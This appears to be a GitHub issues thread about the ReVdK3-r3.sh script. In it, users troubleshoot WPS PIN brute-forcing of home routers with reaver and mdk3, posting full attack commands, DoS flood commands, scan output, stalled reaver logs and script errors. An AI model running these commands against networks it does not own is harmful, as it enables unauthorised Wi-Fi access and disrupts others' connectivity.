r0bag / pentest Goto Github PK

Hi there,

I've been trying to make use of the current wifi audition techniques in regards of Router Password
retrieval.

GEAR:

I've been through car boot sales and adquired some of the current routers on the market.
I've been using a Raspberry Pi Model 3B+ with Kali Linux Installed with

Wireless Card: Alfa AWUSO36NH Driver:rt2800usb Chipset:Ralink Technology, Corp. RT2870/RT3070

As We know already there is no longer more WEP routers being sold, so the only exploitability the system has as I've been reading , apart of capturing the handshake and bruteforcing it (which will take me good weeks with a good computer or paying for a server to do it for me which I dont want), so I wanted to try with the WPS technique reaver.
I'm not really familiarised with the concepts of this program, but I've tried to be cautious on setting it up, and as much as I know sometimes WPS feature get blocked when attemping too many PINS in a short period of time so I made use of the script ReVdK3-r3.sh which combines the power of Reaver with Mdk3 to reset automaticaly the router once it get blocked.

PROGRAMS USED:

Reaver v1.6.5 WiFi Protected Setup Attack Tool
mdk3 Installed: 6.0-4

Being cautious I setted -d 5 and -t 5 which is the parameters what the script let you pretty much tweak, sometimes I would set them even 10 both.

So I ended up with this inputs

(I will codify some of the MAC and ESSID with the wildcards in hashcat)
(assuming that -1 ?d?A?B?C?D?E?F (HEXADECIMAL))
( ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ)
( ?d = 0123456789 )

wash -i wlan0

00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d
F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d
20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u
60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d

Using Reaver

reaver -i mon1 -b 00:F2:01:3C:?1?1:?1?1 -S -c 11 -d 5 -t 5 -l 10 -N -vv

Using mdk3 Dos Flood Attack

mdk3 mon1 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon2 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon3 a -a 00:F2:01:3C:?1?1:?1?1 -s 200

Then I get the following outputs (For the different routers)

00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d

After tried some PINs it get stuck at this point

[+] Trying pin "16585676"
[+] Associated with 00:F2:01:3C:?1?1:?1?1 (ESSID: BTHub3-?u?u?u?d)
[+] 15.15% complete @ 2018-06-16 05:55:31 (0 seconds/pin)
[+] Trying pin "16585676"

F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d

After having tried PINS for entire days it stopped in 99985677 and it doesnt go any further than thatone

[+] Trying pin "99985677"
[!] Found packet with bad FCS, skipping...
[+] Associated with F8:1A:67:78:?1?1:?1?1 (ESSID: TP-LINK_?d?d?d?u?d?d)
[+] 90.90% complete @ 2018-06-16 06:51:05 (0 seconds/pin)
[!] WARNING: 25 successive start failures

20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u

[!] Found packet with bad FCS, skipping...
[+] Trying pin "99985677"
[+] Associated with 20:A6:80:D2:?1?1:?1?1 (ESSID: TALKTALK?u?d?u?d?d?u)
[+] 90.90% complete @ 2018-06-16 06:57:46 (0 seconds/pin)

Gets stuck in the same percentaje as the previous one

60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d

[+] Restored previous session
[+] Waiting for beacon from 60:38:E0:D4:?1?1:?1?1
[!] Found packet with bad FCS, skipping...
[+] Received beacon from 60:38:E0:D4:?1?1:?1?1
[+] Vendor: RealtekS
[+] Trying pin "88885674"
[+] Associated with 60:38:E0:D4:?1?1:?1?1 (ESSID: virginmedia?d?d?d?d?d?d?d)

Gets stuck as well in this PIN.

I reckon in the ones who reached 90% of the process the router may had tricked reaver as if it was trying PINs but its suspicious to have to always reach 90% of the process it was definitely loosing my time.

Is there any workaround you reckon? How is the troubleshooting in this cases?
I have the session files in case you want them.

I have tried with lots of different routers but thoseones they just dont start so I'm not even bothered to post thoseones out (I don't even have saved the session)
Is there any guide to understand thoroughly the parameters of Reaver.
Btw I tried to use Bully but thatone wont even try a single PIN.

Is it finally this WPS vulnerability being fixed by router companies? If so why it doesnt even work in 10 years old routers (like BTHub3) was the router firmware been updated by some process?

If this exploit was fixed, is that means that the only flaw there is now is capturing handshake and bruteforcing it?

Best Regards community,

trap: SIGINT: bad trap
ReVdK3-r3.sh: 204: function: not found
-e
Cleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!
ReVdK3-r3.sh: 207: cleanup: not found

Hey,
When i run it i get an error
./ReVdK3-r3.sh: line 5: syntax error near unexpected token newline
./ReVdK3-r3.sh: line 5:

Would appreciate your help

e

Hi there! First of all, nice work. I've been struggling to get into the router my ISP gave me, until I found this. But I have a question. Can I change the value? I would like it to be only 2-5 failures before it starts the eapol flood attack. Or is there a reason for this?

I have no knowledge of scripting so if it's possible to point me in the right direction.. Thanks!